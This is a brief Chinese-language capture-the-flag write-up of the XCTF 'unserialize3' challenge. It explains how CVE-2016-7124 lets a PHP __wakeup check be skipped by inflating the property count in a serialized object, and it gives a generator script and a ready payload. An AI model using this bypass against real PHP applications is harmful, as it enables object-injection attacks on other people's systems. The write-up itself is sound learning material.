首页 > 其他 > 详细

XCTF-unserialize3

时间:2020-04-14 16:26:12      阅读:63      评论:0      收藏:0      [点我收藏+]

unserialize3

这道题还是php反序列化

进来看到给了几行代码

class xctf{
public $flag = ‘111‘;
public function __wakeup(){
exit(‘bad requests‘);
}
?code=

说明有个xctf类,然后有个魔法函数__wakeup(反序列化时会触发)

今天早上刚做过一道题,利用CVE-2016-7124漏洞,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

php脚本

<?php 
class xctf{
	public $flag = ‘111‘;
	public function __construct($flag) { 
        $this->flag = $flag; 
    }
	public function __wakeup(){
	exit(‘bad requests‘);
	}
}
$a = new xctf(‘xxx‘);
$b = serialize($a);
echo $b;
echo ‘<br>‘;
$c= str_replace(‘:1:‘, ‘:2:‘, $b);
echo $c;

?>

payload:O:4:"xctf":2:{s:4:"flag";s:3:"xxx";}

XCTF-unserialize3

原文:https://www.cnblogs.com/R3col/p/12698508.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!